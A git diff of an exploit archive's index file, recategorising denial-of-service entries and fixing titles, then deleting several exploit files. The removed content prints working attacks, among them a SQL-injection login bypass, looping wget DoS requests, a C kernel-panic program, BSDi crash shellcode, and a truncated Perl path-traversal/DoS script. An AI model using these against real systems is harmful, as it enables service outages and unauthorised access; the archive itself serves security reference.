 35427,platforms/bsd/remote/35427.py,"tnftp - clientside BSD Exploit",2014-12-02,dash,bsd,remote,0
@@ -31927,7 +31927,7 @@ id,file,description,date,author,platform,type,port
 35429,platforms/php/webapps/35429.txt,"PhotoSmash Galleries WordPress Plugin 1.0.x - 'action' Parameter Cross-Site Scripting Vulnerability",2011-03-08,"High-Tech Bridge SA",php,webapps,0
 35430,platforms/php/webapps/35430.txt,"1 Flash Gallery WordPress Plugin 0.2.5 - Cross-Site Scripting and SQL Injection Vulnerabilities",2011-03-08,"High-Tech Bridge SA",php,webapps,0
 35431,platforms/php/webapps/35431.txt,"RuubikCMS 1.0.3 - 'head.php' Cross-Site Scripting Vulnerability",2011-03-08,IRCRASH,php,webapps,0
-35432,platforms/linux/remote/35432.txt,"Wireshark 1.4.3 - NTLMSSP NULL Pointer Dereference Denial Of Service Vulnerability",2011-03-01,"Buildbot Builder",linux,remote,0
+35432,platforms/linux/dos/35432.txt,"Wireshark 1.4.3 - NTLMSSP NULL Pointer Dereference Denial Of Service Vulnerability",2011-03-01,"Buildbot Builder",linux,dos,0
 35433,platforms/osx/remote/35433.pl,"Apple QuickTime 7.5 - (.m3u) Remote Stack Buffer Overflow Vulnerability",2011-03-09,KedAns-Dz,osx,remote,0
 35434,platforms/windows/remote/35434.txt,"WebKit 1.2.x - Local Webpage Cross Domain Information Disclosure Vulnerability",2011-03-09,"Aaron Sigel",windows,remote,0
 35435,platforms/php/webapps/35435.txt,"Lazyest Gallery WordPress Plugin 1.0.26 - 'image' Parameter Cross-Site Scripting Vulnerability",2011-03-10,"High-Tech Bridge SA",php,webapps,0
@@ -31960,7 +31960,7 @@ id,file,description,date,author,platform,type,port
 35462,platforms/hardware/webapps/35462.txt,"Technicolor DT5130 2.05.C29GV - Multiple Vulnerabilities",2014-12-04,Crash,hardware,webapps,80
 35463,platforms/cgi/webapps/35463.txt,"Advertise With Pleasure! (AWP) 6.6 - SQL Injection Vulnerability",2014-12-04,"Robert Cooper",cgi,webapps,80
 35464,platforms/multiple/remote/35464.txt,"Trend Micro WebReputation API 10.5 URI Security Bypass Vulnerability",2011-03-14,"DcLabs Security Research Group",multiple,remote,0
-35465,platforms/multiple/remote/35465.pl,"VLC Media Player 1.0.5 - (.ape) Denial of Service Vulnerability",2011-03-15,KedAns-Dz,multiple,remote,0
+35465,platforms/multiple/dos/35465.pl,"VLC Media Player 1.0.5 - (.ape) Denial of Service Vulnerability",2011-03-15,KedAns-Dz,multiple,dos,0
 35466,platforms/linux/remote/35466.sh,"nostromo nhttpd 1.9.3 - Directory Traversal Remote Command Execution Vulnerability",2011-03-05,"RedTeam Pentesting GmbH",linux,remote,0
 35467,platforms/php/webapps/35467.txt,"SugarCRM <= 6.1.1 Information Disclosure Vulnerability",2011-03-15,"RedTeam Pentesting GmbH",php,webapps,0
 35468,platforms/windows/remote/35468.pl,"Monkey's Audio - (.ape) Buffer Overflow Vulnerability",2011-03-16,KedAns-Dz,windows,remote,0
@@ -32026,9 +32026,9 @@ id,file,description,date,author,platform,type,port
 35526,platforms/php/webapps/35526.txt,"YaCOMAS 0.3.6 OpenCMS - Multiple Cross-Site Scripting Vulnerabilities",2011-03-30,"Pr@fesOr X",php,webapps,0
 35528,platforms/php/webapps/35528.txt,"GLPI 0.85 - Blind SQL Injection",2014-12-15,"Kacper Szurek",php,webapps,0
 35529,platforms/windows/webapps/35529.txt,"Soitec SmartEnergy 1.4 - SCADA Login SQL Injection Authentication Bypass Exploit",2014-12-15,LiquidWorm,windows,webapps,0
-35530,platforms/windows/local/35530.py,"Mediacoder 0.8.33 build 5680 - SEH Buffer Overflow Exploit DoS (.m3u)",2014-12-15,s-dz,windows,local,0
-35531,platforms/windows/local/35531.py,"Mediacoder 0.8.33 build 5680 - SEH Buffer Overflow Exploit DoS (.lst)",2014-12-15,s-dz,windows,local,0
-35532,platforms/windows/local/35532.py,"jaangle 0.98i.977 - Denial of Service Vulnerability",2014-12-15,s-dz,windows,local,0
+35530,platforms/windows/dos/35530.py,"Mediacoder 0.8.33 build 5680 - SEH Buffer Overflow Exploit DoS (.m3u)",2014-12-15,s-dz,windows,dos,0
+35531,platforms/windows/dos/35531.py,"Mediacoder 0.8.33 build 5680 - SEH Buffer Overflow Exploit DoS (.lst)",2014-12-15,s-dz,windows,dos,0
+35532,platforms/windows/dos/35532.py,"jaangle 0.98i.977 - Denial of Service Vulnerability",2014-12-15,s-dz,windows,dos,0
 35533,platforms/php/webapps/35533.py,"Wordpress Download Manager 2.7.4 - Remote Code Execution Vulnerability",2014-12-15,"Claudio Viviani",php,webapps,0
 35548,platforms/php/webapps/35548.txt,"InTerra Blog Machine 1.84 - 'subject' Parameter HTML Injection Vulnerability",2011-03-31,"High-Tech Bridge SA",php,webapps,0
 35535,platforms/php/webapps/35535.php,"PHPads <= 213607 - Authentication Bypass / Password Change Exploit",2014-12-15,"Shaker msallm",php,webapps,0
@@ -32338,7 +32338,7 @@ id,file,description,date,author,platform,type,port
 35870,platforms/windows/dos/35870.rb,"Exif Pilot 4.7.2 - SEH Based Buffer Overflow",2015-01-22,"Osanda Malith",windows,dos,0
 35871,platforms/php/webapps/35871.txt,"Sitemagic CMS 2010.04.17 'SMExt' Parameter Cross Site Scripting Vulnerability",2011-06-21,"Gjoko Krstic",php,webapps,0
 35872,platforms/asp/webapps/35872.txt,"H3C ER5100 Authentication Bypass Vulnerability",2011-06-22,128bit,asp,webapps,0
-35873,platforms/windows/remote/35873.txt,"Wireshark 1.4.5 'bytes_repr_len()' NULL Pointer Dereference Denial Of Service Vulnerability",2011-06-17,rouli,windows,remote,0
+35873,platforms/windows/dos/35873.txt,"Wireshark 1.4.5 - 'bytes_repr_len()' NULL Pointer Dereference Denial Of Service Vulnerability",2011-06-17,rouli,windows,dos,0
 35874,platforms/php/webapps/35874.txt,"Eshop Manager Multiple SQL Injection Vulnerabilities",2011-06-22,"Number 7",php,webapps,0
 35875,platforms/php/webapps/35875.txt,"FanUpdate 3.0 - 'pageTitle' Parameter Cross Site Scripting Vulnerability",2011-06-22,"High-Tech Bridge SA",php,webapps,0
 35876,platforms/windows/dos/35876.html,"Easewe FTP OCX ActiveX Control 4.5.0.9 'EaseWeFtp.ocx' Multiple Insecure Method Vulnerabilities",2011-06-22,"High-Tech Bridge SA",windows,dos,0
@@ -32565,7 +32565,7 @@ id,file,description,date,author,platform,type,port
 36123,platforms/php/webapps/36123.txt,"In-link 2.3.4/5.1.3 RC1 'cat' Parameter SQL Injection Vulnerability",2011-09-08,SubhashDasyam,php,webapps,0
 36126,platforms/multiple/webapps/36126.txt,"CrushFTP 7.2.0 - Multiple Vulnerabilities",2015-02-19,"Rehan Ahmed",multiple,webapps,8080
 36127,platforms/php/webapps/36127.txt,"Piwigo 2.7.3 - Multiple Vulnerabilities",2015-02-19,"Steffen Rösemann",php,webapps,80
-36128,platforms/windows/remote/36128.txt,"Wireshark <= 1.6.1 Malformed Packet Trace File Remote Denial of Service Vulnerability",2011-09-08,Wireshark,windows,remote,0
+36128,platforms/windows/dos/36128.txt,"Wireshark <= 1.6.1 - Malformed Packet Trace File Remote Denial of Service Vulnerability",2011-09-08,Wireshark,windows,dos,0
 36129,platforms/php/webapps/36129.txt,"Pluck 4.7 Multiple Local File Include and File Disclosure Vulnerabilities",2011-09-08,Bl4k3,php,webapps,0
 36130,platforms/multiple/remote/36130.txt,"Spring Security HTTP Header Injection Vulnerability",2011-09-09,"David Mas",multiple,remote,0
 36131,platforms/php/webapps/36131.txt,"Papoo CMS Light 4.0 Multiple Cross Site Scripting Vulnerabilities",2011-09-12,"Stefan Schurtz",php,webapps,0
@@ -32938,7 +32938,7 @@ id,file,description,date,author,platform,type,port
 36513,platforms/windows/remote/36513.txt,"IpTools 0.1.4 Tiny TCP/IP servers Directory Traversal Vulnerability",2012-01-06,demonalex,windows,remote,0
 36514,platforms/windows/remote/36514.pl,"IPtools 0.1.4 Remote Command Server Buffer Overflow Vulnerability",2012-01-06,demonalex,windows,remote,0
 36515,platforms/asp/webapps/36515.txt,"DIGIT CMS 1.0.7 Cross Site Scripting and SQL Injection Vulnerabilities",2012-01-07,"BHG Security Center",asp,webapps,0
-36516,platforms/windows/remote/36516.py,"Acunetix <=9.5 - OLE Automation Array Remote Code Execution",2015-03-27,"Naser Farhadi",windows,remote,0
+36516,platforms/windows/remote/36516.py,"Acunetix <= 9.5 - OLE Automation Array Remote Code Execution",2015-03-27,"Naser Farhadi",windows,remote,0
 36517,platforms/windows/remote/36517.html,"WebGate WinRDS 2.0.8 - StopSiteAllChannel Stack Overflow",2015-03-27,"Praveen Darshanam",windows,remote,0
 36518,platforms/windows/remote/36518.html,"WebGate Control Center 4.8.7 - GetThumbnail Stack Overflow",2015-03-27,"Praveen Darshanam",windows,remote,0
 36519,platforms/windows/remote/36519.html,"WebGate eDVR Manager 2.6.4 - SiteName Stack Overflow",2015-03-27,"Praveen Darshanam",windows,remote,0
@@ -33246,7 +33246,7 @@ id,file,description,date,author,platform,type,port
 36837,platforms/windows/local/36837.rb,"iTunes 10.6.1.7 - '.PLS' Title Buffer Overflow",2015-04-27,"Fady Mohammed Osman",windows,local,0
 36844,platforms/php/webapps/36844.txt,"WordPress <= 4.2 - Stored XSS",2015-04-27,klikki,php,webapps,0
 36839,platforms/multiple/remote/36839.py,"MiniUPnPd 1.0 - Stack Overflow RCE for AirTies RT Series (MIPS)",2015-04-27,"Onur Alanbel (BGA)",multiple,remote,0
-36840,platforms/multiple/dos/36840.py,"Wireshark <=1.12.4 - Memory Corruption and Access Violation PoC",2015-04-27,"Avinash Thapa",multiple,dos,0
+36840,platforms/multiple/dos/36840.py,"Wireshark <= 1.12.4 - Memory Corruption and Access Violation PoC",2015-04-27,"Avinash Thapa",multiple,dos,0
 36841,platforms/windows/local/36841.py,"UniPDF 1.2 - 'xml' Buffer Overflow Crash PoC",2015-04-27,"Avinash Thapa",windows,local,0
 36842,platforms/php/webapps/36842.pl,"OTRS < 3.1.x & < 3.2.x & < 3.3.x - Stored Cross-Site Scripting (XSS)",2015-04-27,"Adam Ziaja",php,webapps,0
 36994,platforms/cgi/webapps/36994.txt,"WebGlimpse 2.18.7 'DOC' Parameter Directory Traversal Vulnerability",2009-04-17,MustLive,cgi,webapps,0
@@ -33487,7 +33487,7 @@ id,file,description,date,author,platform,type,port
 37097,platforms/ios/remote/37097.py,"FTP Media Server 3.0 - Authentication Bypass and Denial of Service",2015-05-25,"Wh1t3Rh1n0 (Michael Allen)",ios,remote,0
 37098,platforms/windows/local/37098.txt,"Microsoft Windows - Local Privilege Escalation (MS15-010)",2015-05-25,"Sky lake",windows,local,0
 37253,platforms/php/webapps/37253.txt,"Paypal Currency Converter Basic For Woocommerce File Read",2015-06-10,Kuroi'SH,php,webapps,0
-37254,platforms/php/webapps/37254.txt,"Wordpress History Collection <=1.1.1 Arbitrary File Download",2015-06-10,Kuroi'SH,php,webapps,80
+37254,platforms/php/webapps/37254.txt,"Wordpress History Collection <= 1.1.1 - Arbitrary File Download",2015-06-10,Kuroi'SH,php,webapps,80
 37255,platforms/php/webapps/37255.txt,"Pandora FMS 5.0_ 5.1 - Authentication Bypass",2015-06-10,"Manuel Mancera",php,webapps,0
 37100,platforms/php/webapps/37100.txt,"Waylu CMS 'products_xx.php' SQL Injection and HTML Injection Vulnerabilities",2012-04-20,TheCyberNuxbie,php,webapps,0
 37101,platforms/php/webapps/37101.txt,"Joomla CCNewsLetter Module 1.0.7 'id' Parameter SQL Injection Vulnerability",2012-04-23,E1nzte1N,php,webapps,0
@@ -33599,14 +33599,14 @@ id,file,description,date,author,platform,type,port
 37252,platforms/php/webapps/37252.txt,"Wordpress RobotCPA Plugin V5 - Local File Inclusion",2015-06-10,T3N38R15,php,webapps,80
 37216,platforms/php/webapps/37216.txt,"Unijimpe Captcha 'captchademo.php' Cross Site Scripting Vulnerability",2012-05-16,"Daniel Godoy",php,webapps,0
 37217,platforms/php/webapps/37217.txt,"Artiphp 5.5.0 Neo 'index.php' Multiple Cross Site Scripting Vulnerabilities",2012-05-17,"Gjoko Krstic",php,webapps,0
-37218,platforms/jsp/webapps/37218.txt,"Atlassian Tempo 6.4.3_ JIRA 5.0 0_ Gliffy 3.7.0 XML Parsing Denial of Service Vulnerability",2012-05-17,anonymous,jsp,webapps,0
+37218,platforms/jsp/dos/37218.txt,"Atlassian Tempo 6.4.3_ JIRA 5.0 0_ Gliffy 3.7.0 - XML Parsing Denial of Service Vulnerability",2012-05-17,anonymous,jsp,dos,0
 37219,platforms/php/webapps/37219.txt,"PHP Address Book 7.0 Multiple Cross Site Scripting Vulnerabilities",2012-05-17,"Stefan Schurtz",php,webapps,0
 37220,platforms/jsp/webapps/37220.txt,"OpenKM 5.1.7 Cross Site Request Forgery Vulnerability",2012-05-03,"Cyrill Brunschwiler",jsp,webapps,0
 37221,platforms/jsp/webapps/37221.txt,"Atlassian JIRA FishEye <= 2.5.7 and Crucible <= 2.5.7 Plugins XML Parsing Unspecified Security Vulnerability",2012-05-17,anonymous,jsp,webapps,0
 37222,platforms/asp/webapps/37222.txt,"Acuity CMS 2.6.2 /admin/file_manager/file_upload_submit.asp Multiple Parameter File Upload ASP Code Execution",2012-05-21,"Aung Khant",asp,webapps,0
 37223,platforms/asp/webapps/37223.txt,"Acuity CMS 2.6.2 /admin/file_manager/browse.asp path Parameter Traversal Arbitrary File Access",2012-05-21,"Aung Khant",asp,webapps,0
 37224,platforms/php/webapps/37224.txt,"Yandex.Server 2010 9.0 - 'text' Parameter Cross Site Scripting Vulnerability",2012-05-21,MustLive,php,webapps,0
-37225,platforms/php/webapps/37225.pl,"concrete5 concrete/js/tiny_mce/plugins/spellchecker/rpc.php Remote DoS",2012-05-20,AkaStep,php,webapps,0
+37225,platforms/php/webapps/37225.pl,"Concrete CMS < 5.5.21 - Multiple Security Vulnerabilities",2012-05-20,AkaStep,php,webapps,0
 37226,platforms/php/webapps/37226.txt,"concrete5 FlashUploader Arbitrary SWF File Upload",2012-05-20,AkaStep,php,webapps,0
 37227,platforms/php/webapps/37227.txt,"concrete5 index.php/tools/required/files/replace searchInstance Parameter XSS",2012-05-20,AkaStep,php,webapps,0
 37228,platforms/php/webapps/37228.txt,"concrete5 index.php/tools/required/files/add_to searchInstance Parameter XSS",2012-05-20,AkaStep,php,webapps,0
@@ -33710,7 +33710,7 @@ id,file,description,date,author,platform,type,port
 37342,platforms/php/webapps/37342.txt,"TinyCMS 1.3 admin/admin.php do Parameter Traversal Local File Inclusion",2012-06-03,KedAns-Dz,php,webapps,0
 37343,platforms/windows/dos/37343.py,"Seagate Dashboard 4.0.21.0 - Crash PoC",2015-06-23,HexTitan,windows,dos,0
 37344,platforms/windows/local/37344.py,"KMPlayer 3.9.1.136 - Capture Unicode Buffer Overflow (ASLR Bypass)",2015-06-23,"Naser Farhadi",windows,local,0
-37440,platforms/php/webapps/37440.txt,"Watchguard XCS <=10.0 - Multiple Vulnerabilities",2015-06-30,Security-Assessment.com,php,webapps,0
+37440,platforms/php/webapps/37440.txt,"Watchguard XCS <= 10.0 - Multiple Vulnerabilities",2015-06-30,Security-Assessment.com,php,webapps,0
 37360,platforms/php/webapps/37360.txt,"GeniXCMS 0.0.3 - XSS Vulnerabilities",2015-06-24,"John Page",php,webapps,80
 37346,platforms/windows/dos/37346.txt,"Paintshop Pro X7 GIF Conversion Heap Memory Corruption Vulnerabilities (LZWMinimumCodeSize)",2015-06-23,"Francis Provencher",windows,dos,0
 37347,platforms/windows/dos/37347.txt,"Photoshop CC2014 and Bridge CC 2014 Gif Parsing Memory Corruption Vulnerabilities",2015-06-23,"Francis Provencher",windows,dos,0
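Review bot: Row 37225 (old line at the end of the previous physical line, new line at the start of this one) is handled differently from the rest of the commit: its description changes from `concrete5 concrete/js/tiny_mce/plugins/spellchecker/rpc.php Remote DoS` to `Concrete CMS < 5.5.21 - Multiple Security Vulnerabilities`, while the path stays under `platforms/php/webapps/` and the type stays `webapps`. Elsewhere in this diff rows whose title names a denial of service (32688, 35432, 37218 and others) are moved to `dos` with the title otherwise kept, so either the new title is a correction that reflects what 37225.pl actually contains, or this row was meant to get the same `dos` move and the title rewrite slipped in instead. A one-line comparison against the file's own header would resolve which; the commit message does not say.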
@@ -34005,7 +34005,7 @@ id,file,description,date,author,platform,type,port
 37670,platforms/osx/local/37670.sh,"OS X 10.10 DYLD_PRINT_TO_FILE Local Privilege Escalation",2015-07-22,"Stefan Esser",osx,local,0
 37671,platforms/multiple/remote/37671.txt,"Websense Content Gateway Multiple Cross Site Scripting Vulnerabilities",2012-08-23,"Steven Sim Kok Leong",multiple,remote,0
 37672,platforms/php/webapps/37672.txt,"JW Player 'logo.link' Parameter Cross Site Scripting Vulnerability",2012-08-29,MustLive,php,webapps,0
-37673,platforms/windows/remote/37673.html,"Microsoft Indexing Service 'ixsso.dll' ActiveX Control Denial of Service Vulnerability",2012-08-24,coolkaveh,windows,remote,0
+37673,platforms/windows/dos/37673.html,"Microsoft Indexing Service - 'ixsso.dll' ActiveX Control Denial of Service Vulnerability",2012-08-24,coolkaveh,windows,dos,0
 37674,platforms/php/webapps/37674.txt,"PHP Web Scripts Text Exchange Pro 'page' Parameter Local File Include Vulnerability",2012-08-24,"Yakir Wizman",php,webapps,0
 37675,platforms/php/webapps/37675.txt,"Joomla! Komento Component 'cid' Parameter SQL Injection Vulnerability",2012-08-27,Crim3R,php,webapps,0
 37676,platforms/asp/webapps/37676.txt,"Power-eCommerce Multiple Cross Site Scripting Vulnerabilities",2012-08-25,Crim3R,asp,webapps,0
@@ -34017,7 +34017,7 @@ id,file,description,date,author,platform,type,port
 37682,platforms/php/webapps/37682.txt,"WordPress Simple:Press Forum Plugin Arbitrary File Upload Vulnerability",2012-08-28,"Iranian Dark Coders",php,webapps,0
 37683,platforms/php/webapps/37683.txt,"Phorum 5.2.18 Multiple Cross Site Scripting Vulnerabilities",2012-08-29,"High-Tech Bridge",php,webapps,0
 37684,platforms/php/webapps/37684.html,"PrestaShop <= 1.4.7 Multiple Cross Site Scripting Vulnerabilities",2012-08-29,"High-Tech Bridge",php,webapps,0
-37685,platforms/xml/webapps/37685.txt,"squidGuard 1.4 Long URL Handling Remote Denial of Service Vulnerability",2012-08-30,"Stefan Bauer",xml,webapps,0
+37685,platforms/xml/dos/37685.txt,"squidGuard 1.4 - Long URL Handling Remote Denial of Service Vulnerability",2012-08-30,"Stefan Bauer",xml,dos,0
 37686,platforms/multiple/webapps/37686.txt,"Hawkeye-G v3.0.1.4912 CSRF Vulnerability",2015-07-24,"John Page",multiple,webapps,0
 37687,platforms/php/webapps/37687.txt,"TomatoCart 'example_form.ajax.php' Cross Site Scripting Vulnerability",2012-08-30,HauntIT,php,webapps,0
 37689,platforms/asp/webapps/37689.txt,"XM Forum 'search.asp' SQL Injection Vulnerability",2012-08-30,Crim3R,asp,webapps,0
@@ -34040,7 +34040,7 @@ id,file,description,date,author,platform,type,port
 37707,platforms/php/webapps/37707.txt,"WordPress Count Per Day Plugin 3.4 - SQL Injection",2015-07-27,"High-Tech Bridge SA",php,webapps,80
 37708,platforms/php/webapps/37708.txt,"Xceedium Xsuite - Multiple Vulnerabilities",2015-07-27,modzero,php,webapps,0
 37709,platforms/php/webapps/37709.txt,"phpFileManager 0.9.8 - Remote Command Execution Vulnerability",2015-07-28,"John Page",php,webapps,0
-37710,platforms/linux/local/37710.txt,"Sudo <=1.8.14 - Unauthorized Privilege",2015-07-28,"daniel svartman",linux,local,0
+37710,platforms/linux/local/37710.txt,"Sudo <= 1.8.14 - Unauthorized Privilege",2015-07-28,"daniel svartman",linux,local,0
 37711,platforms/windows/dos/37711.py,"Classic FTP 2.36 - CWD Reconnection DoS",2015-07-28,St0rn,windows,dos,0
 37712,platforms/php/webapps/37712.txt,"phpFileManager 0.9.8 - CSRF Vulnerability",2015-07-29,"John Page",php,webapps,80
 37713,platforms/php/webapps/37713.txt,"2Moons - Multiple Vulnerabilities",2015-07-29,bRpsd,php,webapps,80
@@ -34074,3 +34074,4 @@ id,file,description,date,author,platform,type,port
 37749,platforms/lin_x86/shellcode/37749.c,"Linux x86 Egg Hunter Shellcode (19 bytes)",2015-08-10,"Guillaume Kaddouch",lin_x86,shellcode,0
 37750,platforms/php/webapps/37750.txt,"WDS CMS - SQL Injection",2015-08-10,"Ismail Marzouk",php,webapps,80
 37754,platforms/php/webapps/37754.txt,"WordPress Candidate Application Form Plugin 1.0 - Arbitrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80
+37764,platforms/windows/dos/37764.html,"Internet Explorer CTreeNode::GetCascadedLang Use-After-Free Vulnerability (MS15-079)",2015-08-12,"Blue Frost Security GmbH",windows,dos,0
diff --git a/platforms/asp/webapps/12527.txt b/platforms/asp/webapps/12527.txt
deleted file mode 100755
index 3b1d4e7bc..000000000
--- a/platforms/asp/webapps/12527.txt
+++ /dev/null
@@ -1,49 +0,0 @@ -************************************************************ - -** Administrador de Contenidos Admin Login Bypass vulnerability - -************************************************************ - -** Prodcut: Administrador de Contenidos - -** Home : www.DZ4All.cOm/Cc - -** Vunlerability : Admin Bypass - -** Risk : High - -** Dork : "Diseño Web Hernest Consulting S.L." - -************************************************************ - -** Discovred by: Ra3cH - -** From : Algeria - -** Contact : e51@hotmail.fr - -** ********************************************************* - -** Greetz to : ALLAH - -** All Members of http://www.DZ4All.cOm/Cc - -** And My BrOther AnGeL25dZ & yasMouh & ProToCoL & Mr.Benladen - -************************************************************ - -** Exploit: - -** http://[PATH]/admin or http://[PATH]/admin/Login.Asp - -** - -** user : ' or '1=1 - -** password : ' or '1=1 - -** - -************************************************************ - -************************************************************ \ No newline at end of file diff --git a/platforms/asp/webapps/27258.txt b/platforms/asp/webapps/27258.txt deleted file mode 100755 index 2a2bd2483..000000000 --- a/platforms/asp/webapps/27258.txt +++ /dev/null 
@@ -1,17 +0,0 @@
-source: http://www.securityfocus.com/bid/16771/info
-
-Ipswitch WhatsUp Professional 2006 is susceptible to a remote denial-of-service vulnerability. This issue is due to the application's failure to properly handle certain HTTP GET requests.
-
-This issue allows remote attackers to consume excessive CPU resources on targeted computers, denying service to legitimate users.
-
-http://www.example.com:81/NmConsole/Login.asp?bIsJavaScriptDisabled=true&sLoginPassword=&btnLogIn=[Log&In]=&sLoginUserName=
-http://www.example.com:81/NmConsole/Login.asp?bIsJavaScriptDisabled=true&sLoginUserName=&btnLogIn=[Log&In]=&sLoginPassword=
-http://www.example.com:81/NmConsole/Login.asp?bIsJavaScriptDisabled=true&sLoginUserName=&sLoginPassword=&In]=&btnLogIn=
-http://www.example.com:81/NmConsole/Login.asp?bIsJavaScriptDisabled=true&sLoginUserName=&sLoginPassword=&btnLogIn=[Log&In]=
-
-An example script to exploit this issue is also available:
-
-while [ 1 ]
-do
-wget -O /dev/null http://www.example.com:81/NmConsole/Login.asp?bIsJavaScriptDisabled=true&sLoginPassword=&b;tnLogIn=[Log&In]=&sLoginUserName=
-done
\ No newline at end of file
diff --git a/platforms/asp/webapps/35154.txt b/platforms/asp/webapps/35154.txt
deleted file mode 100755
index c1a1cd77b..000000000
--- a/platforms/asp/webapps/35154.txt
+++ /dev/null
@@ -1,7 +0,0 @@
-source: http://www.securityfocus.com/bid/45588/info
-
-Sigma Portal is prone to a denial-of-service vulnerability.
-
-Attackers can exploit this issue to cause the server to consume excessive resources, denying service to legitimate users.
-
-http://www.example.com/Portal/Picture/ShowObjectPicture.aspx?Width=%27910000&Height=1099000-=&ObjectType=News&ObjectID=(Picture ID)
\ No newline at end of file
diff --git a/platforms/bsd/local/19488.c b/platforms/bsd/local/19488.c
deleted file mode 100755
index ab82d4724..000000000
--- a/platforms/bsd/local/19488.c
+++ /dev/null
@@ -1,38 +0,0 @@ -source: http://www.securityfocus.com/bid/622/info - -A denial of service attack exists that affects FreeBSD, NetBSD and OpenBSD, and potentially other operating systems based in some part on BSD. It is believed that all versions of these operating systems are vulnerable. The vulnerability is related to setting socket options regarding the size of the send and receive buffers on a socketpair. By setting them to certain values, and performing a write the size of the value the options have been set to, FreeBSD can be made to panic. NetBSD and OpenBSD do not panic, but network applications will stop responding. - -Details behind why this happens have not been made available. - -#include -#include -#include - -#define BUFFERSIZE 204800 - -extern int -main(void) -{ -int p[2], i; -char crap[BUFFERSIZE]; - -while (1) -{ -if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1) -break; -i = BUFFERSIZE; -setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int)); -setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int)); -setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int)); -setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int)); -fcntl(p[0], F_SETFL, O_NONBLOCK); -fcntl(p[1], F_SETFL, O_NONBLOCK); -write(p[0], crap, BUFFERSIZE); -write(p[1], crap, BUFFERSIZE); -} -exit(0); -} - - - - \ No newline at end of file diff --git a/platforms/bsd/local/21077.c b/platforms/bsd/local/21077.c deleted file mode 100755 index 583358999..000000000 --- a/platforms/bsd/local/21077.c +++ /dev/null 
@@ -1,31 +0,0 @@ -source: http://www.securityfocus.com/bid/3220/info - -It has been reported that there is a locally exploitable vulnerability in BSDI. - -It is allegedly possible for a userland process to cause the kernel to halt. - -This may be due to a bad system call. - -/* (BSDi)*[v3.0/3.1] system failure, by - v9[v9@realhalo.org]. this will result - in the ability of any user to fail the - system, and reboot it. this bug is - similar to that of the "f00f" bug. - results are similar, except this reboots - the machine instead of having a freezing - effect. tested, and built for: BSDi - v3.0/3.1. (arch/non-specific to BSDi) -*/ -char bsdi_killcode[] = - "\xb8\x8f\xf8\xff\x0b\xf7\xd0\x50\xb0\x0b" - "\xb0\x9a\x50\x89\xe7\xff\xd7"; -int main() { - void (*execcode)()=(void *)bsdi_killcode; - printf("[ (BSDi)*[v3.0/3.1]: system failu" - "re, by: v9[v9@realhalo.org]. ]\n"); - printf("*** no output should be seen afte" - "r this point.\n"); - execcode(); - printf("*** system failure failed.\n"); - exit(0); -} diff --git a/platforms/cgi/remote/20400.txt b/platforms/cgi/remote/20400.txt deleted file mode 100755 index 68dad4a40..000000000 --- a/platforms/cgi/remote/20400.txt +++ /dev/null @@ -1,8 +0,0 @@ -source : http://www.securityfocus.com/bid/1934/info - -Cart32 is a shopping cart application for e-commerce enabled sites. - -Cart32 is subject to a denial of service. When requesting a specially formed URL the application will cause the CPU utilization to spike to 100%. A restart of the application is required in order to gain normal functionality. - - -http://target/cgi-bin/c32web.exe/ShowProgress \ No newline at end of file diff --git a/platforms/cgi/remote/20753.txt b/platforms/cgi/remote/20753.txt deleted file mode 100755 index da9211295..000000000 --- a/platforms/cgi/remote/20753.txt +++ /dev/null 
@@ -1,9 +0,0 @@
-source: http://www.securityfocus.com/bid/2588/info
-
-Net.Commerce is part of the Websphere platform of products distributed by IBM. Net.Commerce provides several versatile features to facilitate e-commerce, and features in performance and reliability.
-
-A problem in the Net.Commerce package could allow a remote user to deny service to legitimate users of the service hosted by the Websphere server. This is due to the handling of long strings by the macro.d2w cgi included with a Net.Commerce installation. By supplying a long string of "%0a" characters to the CGI, the Websphere server ceases operation.
-
-A remote user may use this vulnerability to crash the Websphere server, thus denying service to legitimate users.
-
-http://host/cgi-bin/ncommerce3/ExecMacro/macro.d2w/%0a%0a..(aprox 1000)..%0a
\ No newline at end of file
diff --git a/platforms/cgi/webapps/1157.pl b/platforms/cgi/webapps/1157.pl
deleted file mode 100755
index d2a11074c..000000000
--- a/platforms/cgi/webapps/1157.pl
+++ /dev/null
@@ -1,54 +0,0 @@ -#!/usr/bin/perl - - use LWP::Simple; - - if (@ARGV < 3) -{ - print "\nUsage: $0 [server] [path] [mode] [count for DoS]\n"; - print "sever - URL chat\n"; - print "path - path to chat.pl\n"; - print "mode - poc or dos,\n"; - print " poc - simple check without DoS and exit,\n"; - print " dos - DoS, you must set count for requests in 4 argument.\n\n"; - exit (); -} - $DoS = "dos"; - $POC = "poc"; - $server = $ARGV[0]; - $path = $ARGV[1]; - $mode = $ARGV[2]; - $count = $ARGV[3]; - print qq( - ################################### - # GTChat <= 0.95 Alpha remote DoS # - # tested on GTChat 0.95 Alpha # - # (c)oded by x97Rang 2005 RST/GHC # - # Respect: b1f, 1dt.w0lf, ed # - ################################### ); - if ($mode eq $POC) -{ - print "\n\nTry read file /etc/resolv.conf, maybe remote system unix...\n"; - $URL = sprintf("http://%s%s/chat.pl?language=../../../../../../../../../../etc/resolv.conf%00 HTTP/1.0\nHost: %s\nAccept:*/*\nConnection:close\n\n",$server,$path,$server); - $content = get "$URL"; - if ($content =~ /(domain|sortlist|options|search|nameserver|dhclient)/) -{ print "File read successfully, remote system is *nix and $server are VULNERABLE!\n"; exit(); } - if ($content =~ /Fatal error/) -{ - print "File read failed, but *Fatal error* returned, $server MAYBE vulnerable, check all output:\n"; - print "=== OUTPUT ===============================================================================\n"; - print "\n$content\n"; - print "=============================================================================== OUTPUT ===\n"; - exit(); -} - else { print "Hmm.. 
